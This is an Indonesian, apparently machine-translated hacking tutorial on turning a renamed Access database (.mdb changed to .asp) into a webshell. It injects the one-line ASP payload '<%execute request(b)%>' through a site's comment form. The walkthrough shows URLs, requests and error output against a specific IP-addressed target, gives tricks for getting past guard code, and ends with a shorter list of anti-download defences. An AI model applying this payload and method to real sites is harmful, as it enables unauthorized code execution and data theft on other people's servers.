Mungkin dengan berkembangnya teknologi keamanan jaringan, kualitas administrator semakin meningkat. Saat menggunakan sistem access+asp, untuk mencegah database terdownload, mdb diubah menjadi asp atau asa. Jangan bicara tentang mengubah sufiks secara langsung. Anda bisa langsung mendownloadnya menggunakan alat seperti Internet Express. Faktanya, Anda telah membuka pintu bagi penyusup. Penyusup dapat menggunakan database dengan akhiran asp/asa untuk mendapatkan webshell secara langsung.
satu. Ide
Semua orang tahu bahwa <%%> adalah pengidentifikasi file asp, yang berarti file asp hanya akan mengeksekusi kode antara <%%>. Semua data sistem web akses+asp disimpan dalam file database (file mdb ), karena administrator mengubah file mdb menjadi file asp, jika data yang kita kirimkan berisi <%%>, maka ketika kita mengakses database asp, kode antara <%%> akan dieksekusi. Hal ini menyebabkan kita hanya mengirimkan kode berbahaya ke database, sehingga database dengan akhiran asp adalah webshell kita.
dua. Contoh
Temukan saja targetnya. Pertama, mari kita periksa database untuk melihat apakah database tersebut memiliki akhiran asp: http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5&log_id=210
kembali:
Copy kode kodenya sebagai berikut:
Kesalahan kompiler Microsoft VBScript '800a03f6'
'Akhir' tidak ada
/iisHelp/common/500-100.asp, baris 242
Kesalahan Mesin Basis Data Microsoft JET '80004005'
'D:/log_mdb/%29dlog_mdb%29.asp' bukan jalur yang valid. Tentukan apakah nama jalur dieja dengan benar dan apakah Anda terhubung ke server tempat file disimpan.
/test/conn.asp, baris 18
Kami mengirimkan: http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp mengembalikan sekumpulan karakter yang kacau, sehingga kami dapat langsung mengunduh database menggunakan alat seperti Internet Express (kami tidak akan membahasnya Di Sini). Kami kembali ke beranda dan melihat ada fungsi komentar netizen. Mari mendaftar sebagai pengguna dan kirim komentar:
<%eksekusi permintaan(b)%>
Dengan cara ini, kita menulis kode asp: <%execute request(b)%> ke dalam database, maka database: adalah webshell kita. Kirim: http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp Di akhir kode yang kacau kita melihat:
Copy kode kodenya sebagai berikut:
/iisHelp/common/500-100.asp, baris 242
Kesalahan runtime Microsoft VBScript '800a000d'
Ketik ketidakcocokan: 'eksekusi'
/test/dlog/log_mdb/%29dlog_mdb%29.asp, baris 1266
Catatan: Saat kami mengirimkan kode ke database, konten kode tidak boleh terlalu besar. Jadi kami menggunakan <%eksekusi permintaan(b)%>.
tiga. Beberapa pertanyaan dan ide lainnya
1. Untuk database yang mengubah akhiran menjadi asp, dan menambahkan kode asp ilegal seperti <%='a'-1%> ke database untuk sepenuhnya mencegah pengunduhan, karena ada kode asp ilegal di dalamnya, setelah memasukkan kode webshell kami Menjalankan itu hanya akan menampilkan kesalahan kode ilegal sebelumnya tanpa mengeksekusi kode shell kita. Meskipun hal ini dapat mencegah serangan tertentu, masih ada bahaya tersembunyi tertentu. Selama kita menambahkan kode yang kompatibel dengan kesalahan sebelum kode kesalahan, kita dapat menampilkan dan mengeksekusi kode webshell yang kita masukkan dengan benar.
2. Untuk file-file yang belum diubah suffixnya yaitu file mdb bisa langsung kita download untuk mendapatkan password backgroundnya, setelah masuk backgroundnya kita bisa menggunakan backup database untuk merubah suffixnya menjadi asp.
Ringkasan metode anti-unduh mdb
1: Di bawah iis6, jika ekstensi tidak ditentukan, kesalahan 404 file tidak ditemukan akan muncul saat mengakses.
Oleh karena itu, Anda dapat secara sewenang-wenang memberi nama database ke dalam nama file yang tidak akan pernah muncul untuk mencapai efek aman, seperti: xxxxx.xxxxxxxxxx
2 Jika database ditempatkan di luar situs web, maka database tersebut tidak akan pernah dapat diakses. Misalnya: e:/web/ adalah situs web Anda
Lalu letakkan databasenya di e:/
3. Seperti disebutkan di atas, ubah .mdb menjadi .asp dan sekaligus tuangkan ke dalam tabel khusus yang berisi <% karakter biner.
4. Atau ubah .mdb menjadi .asp dan buka dengan winhex secara bersamaan. Anda dapat menemukan bahwa ada bagian panjang string 00 setelah 176. Anda juga dapat mencegah pengunduhan dengan mengubahnya menjadi potongan kode asp sesuka hati. , yang tidak akan mempengaruhi fungsi database. Misalnya:
<%
respon.write(akses ilegal)
respon.akhir()
%>
Sekarang menambahkan # dan spasi pada nama database akan di-crack. Misalnya, # = <%35 dan spasi = <%20.
Jadi tidak ada gunanya lagi menggunakannya sekarang. .
Jika itu adalah server Anda sendiri, atur di IIS:
Buat file DLL kosong baru, lalu tambahkan pemetaan di IIS. Pilih DLL yang baru saja Anda buat sebagai file yang dapat dieksekusi, isi .mdb sebagai ekstensi, simpan dan mulai ulang layanan IIS.